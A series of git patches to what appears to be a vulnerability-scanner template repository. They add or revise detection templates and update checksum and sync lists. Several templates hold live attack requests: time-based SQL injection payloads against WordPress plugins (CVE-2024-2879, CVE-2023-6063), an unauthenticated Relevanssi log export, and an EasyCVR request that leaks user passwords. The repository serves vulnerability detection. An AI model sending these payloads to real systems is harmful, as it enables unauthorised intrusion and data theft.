a/http/vulnerabilities/other/aquatronica-info-leak.yaml +++ b/http/vulnerabilities/other/aquatronica-info-leak.yaml @@ -36,3 +36,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100aadc273e2296921d5b626e81c36425d5e2e06d2ab2bb28dd474b64c2f4fe02150220487e00677d55c5024c3a496b423945c214d9edc0c360d3a0614a8b227e0e17cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c6b7f0ff19fe86dad116ee5176466207b89dd2b7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:25:03 +0000 Subject: [PATCH 1734/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2b85aef4a8..6b882fe3ab 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/busybox-repository-browser.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' + - 'http/exposed-panels/cox-business-panel.yaml' - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/oracle-access-management.yaml' From 2e8ffd20afde04165ff16d560e44cb963b66d137 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:28:10 +0000 Subject: [PATCH 1735/1768] Auto Generated New Template Addition List [Tue Jun 4 17:28:10 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 244353d905..d9ff43ffe7 100644 --- a/.new-additions +++ b/.new-additions @@ -60,6 +60,7 @@ http/misconfiguration/installer/wowonder-installer.yaml http/technologies/cowboy-detect.yaml http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml +http/technologies/sparklighter-detect.yaml http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From b22084e8b226423392f75bf9285252e3c4b6d639 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:28:17 +0000 Subject: [PATCH 1736/1768] Auto Generated Templates Checksum [Tue Jun 4 17:28:17 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92e6563fa3..56e923c90f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7012,6 +7012,7 @@ http/technologies/smtp2go-detect.yaml:6019a0c74e3488774d4f3909ee47c17cf6f5490b http/technologies/snipeit-panel.yaml:aeed56e720ca069ccc5fffae2c3a77a93642c89b http/technologies/sogo-detect.yaml:12c9d0bda8f9ed788ffc1ff04aca07cf08a21646 http/technologies/sonicwall-email-security-detect.yaml:661f432cedd68b0aacd6ef82aaf5fbfcb9c03281 +http/technologies/sparklighter-detect.yaml:afaadfd576d288a6071151c16878d9c1d5587dbf http/technologies/spinnaker-detect.yaml:1e4b0cf0ce948c69e22a6d1022e8065c23a9f072 http/technologies/splash-rendering-service.yaml:31a8465843cc494d2146c66dce532bf6ce4cc2b0 http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 @@ -7716,7 +7717,7 @@ http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:ec53fcff7689e47418ad652a41c http/vulnerabilities/other/alumni-management-sqli.yaml:44c134fdb53c7bf6bbc9779b785a4339900d594a http/vulnerabilities/other/apache-druid-log4j.yaml:de3259cc8fff10dc0f2808f44db4ed6a811ea5e3 http/vulnerabilities/other/applezeed-sqli.yaml:634b09843a3695264a07660a2d827fa1f6c4a82e -http/vulnerabilities/other/aquatronica-info-leak.yaml:78987131bb50f9efbdcf8f4c060c696627287557 +http/vulnerabilities/other/aquatronica-info-leak.yaml:6b90129c71b401a56ea780ca90fd695d6d8a4a76 http/vulnerabilities/other/array-vpn-lfi.yaml:50b84caddedf1b89afcba09bd5cbbdcfb0005897 http/vulnerabilities/other/asanhamayesh-lfi.yaml:5b667a416dec3c28014f255eee89f7155c6392f7 http/vulnerabilities/other/aspcms-commentlist-sqli.yaml:62d97842cbaf3577d193d53daf38c78c55369e5a @@ -8624,7 +8625,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4aee2cd5329b91b6d4668bdb739a2bc53ee41b4b +templates-checksum.txt:909b2cd7fb45b7050c8683d35e03e9d35aa6751e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 413a41db3746c66b65b48c1cd2267dc983bb7ba4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 4 Jun 2024 17:28:56 +0000 Subject: [PATCH 1737/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6b882fe3ab..bda9cc89ee 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -65,6 +65,7 @@ on: - 'http/technologies/cowboy-detect.yaml' - 'http/technologies/gabia-server-detect.yaml' - 'http/technologies/gotweb-detect.yaml' + - 'http/technologies/sparklighter-detect.yaml' - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 34684c26a184002c78d43d2c4b5127ba63b9c55b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 4 Jun 2024 17:30:01 +0000 Subject: [PATCH 1738/1768] Auto Template Signing [Tue Jun 4 17:30:01 UTC 2024] :robot: --- http/exposed-panels/cox-business-panel.yaml | 1 + http/technologies/sparklighter-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/cox-business-panel.yaml b/http/exposed-panels/cox-business-panel.yaml index 3a0d5192d3..442fbaaded 100644 --- a/http/exposed-panels/cox-business-panel.yaml +++ b/http/exposed-panels/cox-business-panel.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202f0783850ff8e6ce5bd1c7ae9410397ff875b5faf3b291ac333da2a618508828022100e296680b28b7dd0221e526c5cf495d4308078f39630e99d450aca0a6ba76eddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 95913d9fe2..6296410e7b 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207385072267045626e21df0372710dba86a13eb83ba4f174534eced87bda3caf902203f7a6980f505827c380f8d3255574a0d02e42637f362cc66340dce59452f5150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 48c2ad816720ca34f1c3e092830e78877059da7b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 09:59:33 +0530 Subject: [PATCH 1739/1768] Create easycvr-info-leak.yaml --- .../other/easycvr-info-leak.yaml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/vulnerabilities/other/easycvr-info-leak.yaml diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml new file mode 100644 index 0000000000..1f82da48d7 --- /dev/null +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -0,0 +1,30 @@ +id: easycvr-info-leak +info: + name: EasyCVR video management - Users Information Exposure + author: pussycat0x + severity: high + description: | + EasyCVR video management platform has leaked user information + reference: + - https://github.com/wy876/POC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md + metadata: + verified: true + fofa-query: title="EasyCVR" + tags: unauth,easycvr,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10" + + matchers: + - type: word + words: + - "count" + - "Password" + - "RoleId" + condition: and + + - type: status + status: + - 200 From b1dff1a023f06b2dbe2560167dd3bc9b9aa602b5 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 5 Jun 2024 10:24:27 +0530 Subject: [PATCH 1740/1768] Update easycvr-info-leak.yaml --- .../other/easycvr-info-leak.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 1f82da48d7..a00a473043 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -12,11 +12,28 @@ info: fofa-query: title="EasyCVR" tags: unauth,easycvr,misconfig +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - "EasyCVR" + + - type: status + status: + - 200 + - method: GET path: - "{{BaseURL}}/api/v1/userlist?pageindex=0&pagesize=10" + matchers-condition: and matchers: - type: word words: From dba6004666057ed7c138b9a951af65b7ff434efe Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 12:33:25 +0530 Subject: [PATCH 1741/1768] updated macthers,path,req & info --- .../cves/2024/CVE-2024-1380.yaml | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) rename CVE-2024-1380.yaml => http/cves/2024/CVE-2024-1380.yaml (59%) diff --git a/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml similarity index 59% rename from CVE-2024-1380.yaml rename to http/cves/2024/CVE-2024-1380.yaml index 62848e8eb1..082b145c72 100644 --- a/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -1,36 +1,39 @@ id: CVE-2024-1380 info: - name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export + name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export author: FLX severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380 - - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-1380 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1380 epss-score: 0.00043 epss-percentile: 0.0866 - tags: wordpress,relevanssi,cve,vulnerability,cve2024 + metadata: + verified: true + max-request: 1 + fofa-query: "/wp-content/plugins/relevanssi/" + tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure http: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php" + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - body: "action=&relevanssi_export=1" + action=&relevanssi_export=1 matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' - - 'contains(header, "Content-Type: application/download")' \ No newline at end of file + - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")' + condition: and From 37b761ab59d6e51ffff50b2822475fe667cb06ed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 12:54:31 +0530 Subject: [PATCH 1742/1768] Fix typo in CVE-2024-2879.yaml --- http/cves/2024/CVE-2024-2879.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index f07dc24c46..0b69067169 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -45,7 +45,7 @@ http: - raw: - | @timeout: 10s - GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1' + GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1 Host: {{Hostname}} matchers: @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 From cb69f0018d6d4763371cf1d360051014cad3566b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:27:56 +0000 Subject: [PATCH 1744/1768] Auto Generated Templates Checksum [Wed Jun 5 07:27:56 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 56e923c90f..961e7a54e7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:8f4368955da161211eeaa0efc6bc9074fc1aeabb +http/cves/2024/CVE-2024-2879.yaml:08b2573251894249985623de851c6b1a013507ec http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 @@ -3729,7 +3729,7 @@ http/exposed-panels/corebos-panel.yaml:f5c97e99526a78856683eab9bead66f41151d5bb http/exposed-panels/cortex-xsoar-login.yaml:73c55686323fbaf56a48c90d96ca1a55295d78f6 http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e39697d http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 -http/exposed-panels/cox-business-panel.yaml:57fc005509d4bf4caa98e0c3a179742bb3d29b09 +http/exposed-panels/cox-business-panel.yaml:69406ee37514b80af11858b11dd20786215a7f6e http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 @@ -7012,7 +7012,7 @@ http/technologies/smtp2go-detect.yaml:6019a0c74e3488774d4f3909ee47c17cf6f5490b http/technologies/snipeit-panel.yaml:aeed56e720ca069ccc5fffae2c3a77a93642c89b http/technologies/sogo-detect.yaml:12c9d0bda8f9ed788ffc1ff04aca07cf08a21646 http/technologies/sonicwall-email-security-detect.yaml:661f432cedd68b0aacd6ef82aaf5fbfcb9c03281 -http/technologies/sparklighter-detect.yaml:afaadfd576d288a6071151c16878d9c1d5587dbf +http/technologies/sparklighter-detect.yaml:727d2d130399c76b2c47f9a22f4e58933d7fbef5 http/technologies/spinnaker-detect.yaml:1e4b0cf0ce948c69e22a6d1022e8065c23a9f072 http/technologies/splash-rendering-service.yaml:31a8465843cc494d2146c66dce532bf6ce4cc2b0 http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 @@ -8625,7 +8625,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:909b2cd7fb45b7050c8683d35e03e9d35aa6751e +templates-checksum.txt:29d6b7a538b053b72b0c72fcff1bf8d27cfe5070 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9599540b89fbe57a9084d4d674113e6a5f605182 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:29:37 +0000 Subject: [PATCH 1745/1768] Auto Template Signing [Wed Jun 5 07:29:37 UTC 2024] :robot: --- http/cves/2024/CVE-2024-2879.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 0b69067169..05ffbf675b 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -55,4 +55,4 @@ http: - status_code == 200 - contains(body, "<script>") condition: and -# digest: 4b0a0048304602210093a5b04866b078b807cfbd803744ae129e205970fc34c73f9973d5bfabdd2355022100ddc08432b37d7c1696f3d5b2e311091d4815737e67056280e524abc9c49b4f3d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201d08df52fd34a2899c7ad336122c98cb8a653f7b46dc73ca7520b4da782b28450221008fde2dd001e36505866de89454fb87ee47618f6289b7fa30f30abf8c45a71bbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 57776fdf433a0c56b92148d722f15d94aa6bd51a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 5 Jun 2024 13:09:33 +0530 Subject: [PATCH 1746/1768] Fix FN CVE-2023-6063.yaml --- http/cves/2023/CVE-2023-6063.yaml | 40 +++++++++++++------------------ 1 file changed, 16 insertions(+), 24 deletions(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index a2a2062207..c2d70c1ddf 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,7 +1,7 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: - name: WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection + name: WP Fastest Cache 1.2.2 - SQL Injection author: DhiyaneshDK severity: high description: | @@ -22,7 +22,7 @@ info: epss-percentile: 0.90865 cpe: cpe:2.3:a:wpfastestcache:wp_fastest_cache:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 + max-request: 3 vendor: wpfastestcache product: wp_fastest_cache framework: wordpress @@ -30,32 +30,24 @@ info: fofa-query: body=/wp-content/plugins/wp-fastest-cache/ publicwww-query: /wp-content/plugins/wp-fastest-cache/ tags: cve,cve2023,wp-fastest-cache,wpscan,wordpress,wp-plugin -flow: http(1) && http(2) + +flow: | + for (var i = 0; i < 3; i++) { + http(1) + } http: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" + - raw: + - | + @timeout: 20s + GET /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(6)))NkcI) AND "tqKU"="tqKU matchers: - type: dsl dsl: + - 'duration>=6' - 'status_code == 200' - - 'contains(body, "WP Fastest Cache")' + - 'contains(body, "/wp-")' condition: and - internal: true - - - method: GET - path: - - "{{BaseURL}}/wp-login.php" - headers: - Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU - - matchers: - - type: dsl - dsl: - - 'duration>=7' - - 'status_code == 200' - - 'contains(body, "wp-admin")' - condition: and -# digest: 490a00463044022034e6469fb175abf5f0ead5f467b0674899bfb4a1776a6188e97231cabcc92e7202206b25fdfb241ed91d4cee2ee05e8f798bd0bd1b0fcf6ece85993f972f331d224f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From ce1973b1d18bb611c564630d0828b95bc939f0b2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:16:41 +0530 Subject: [PATCH 1747/1768] added remediation --- http/cves/2024/CVE-2024-1380.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1380.yaml b/http/cves/2024/CVE-2024-1380.yaml index 082b145c72..5a444936cd 100644 --- a/http/cves/2024/CVE-2024-1380.yaml +++ b/http/cves/2024/CVE-2024-1380.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + remediation: Fixed in 4.22.1 reference: - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve From f284d5654b5060d3722edda09e4f83cce0484319 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:20:02 +0530 Subject: [PATCH 1748/1768] added internal: true --- http/vulnerabilities/other/easycvr-info-leak.yaml | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index a00a473043..94a5bab8a8 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -1,4 +1,5 @@ id: easycvr-info-leak + info: name: EasyCVR video management - Users Information Exposure author: pussycat0x @@ -19,15 +20,13 @@ http: path: - "{{BaseURL}}" - matchers-condition: and matchers: - - type: word - words: - - "<title>EasyCVR" - - - type: status - status: - - 200 + - type: dsl + internal: true + dsl: + - 'status_code == 200' + - 'contains(body, "<title>EasyCVR")' + condition: and - method: GET path: From 9b2a2fe13cde0485eb55e71160742cf57d230681 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 5 Jun 2024 13:20:57 +0530 Subject: [PATCH 1749/1768] fix trail space --- http/cves/2023/CVE-2023-6063.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-6063.yaml b/http/cves/2023/CVE-2023-6063.yaml index c2d70c1ddf..a8830ef8e9 100644 --- a/http/cves/2023/CVE-2023-6063.yaml +++ b/http/cves/2023/CVE-2023-6063.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-6063 +id: CVE-2023-6063 info: name: WP Fastest Cache 1.2.2 - SQL Injection From 598623a18eaa6f52f06c602f17022e180687315b Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 07:53:02 +0000 Subject: [PATCH 1750/1768] Auto Generated New Template Addition List [Wed Jun 5 07:53:02 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index d9ff43ffe7..b04d215c02 100644 --- a/.new-additions +++ b/.new-additions @@ -64,5 +64,7 @@ http/technologies/sparklighter-detect.yaml http/vulnerabilities/other/aquatronica-info-leak.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml +http/vulnerabilities/other/easycvr-info-leak.yaml +javascript/backdoor/proftpd-backdoor.yaml network/detection/bitvise-ssh-detect.yaml passive/cves/2024/CVE-2024-25723.yaml From 46265ca151f44418964c225f0494a8ebf2241313 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 5 Jun 2024 07:53:11 +0000 Subject: [PATCH 1751/1768] Auto Generated Templates Checksum [Wed Jun 5 07:53:11 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 961e7a54e7..8ae99984f2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3294,7 +3294,7 @@ http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:08b2573251894249985623de851c6b1a013507ec +http/cves/2024/CVE-2024-2879.yaml:c2ce4ab84a2eac56ef529eeba7a3749e0394cd43 http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 @@ -8388,6 +8388,7 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/audit/mysql/mysql-load-file.yaml:d61333fa25344c2c59bbc1b18b5907a83ea48441 +javascript/backdoor/proftpd-backdoor.yaml:a50e27ef624d89532253c293b2d646d1cbbefe39 javascript/cves/2012/CVE-2012-2122.yaml:94abd222ef37d5fcab0bd7d4bd3801b63236762c javascript/cves/2016/CVE-2016-8706.yaml:2b62e791d6879ee11d4c9894198c31e6af8c2e05 javascript/cves/2019/CVE-2019-9193.yaml:11b9baf1c50e125986f9667f3538b5ebdf8f445b @@ -8625,7 +8626,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:29d6b7a538b053b72b0c72fcff1bf8d27cfe5070 +templates-checksum.txt:6a2d5af209d4d4dc55fcb6df1b0e142dccc53012 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 00e07adfadc66fa1d4612ceb6b763b6fe82de3c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Wed, 5 Jun 2024 07:53:51 +0000 Subject: [PATCH 1753/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bda9cc89ee..ec16888164 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -69,6 +69,8 @@ on: - 'http/vulnerabilities/other/aquatronica-info-leak.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' + - 'http/vulnerabilities/other/easycvr-info-leak.yaml' + - 'javascript/backdoor/proftpd-backdoor.yaml' - 'network/detection/bitvise-ssh-detect.yaml' - 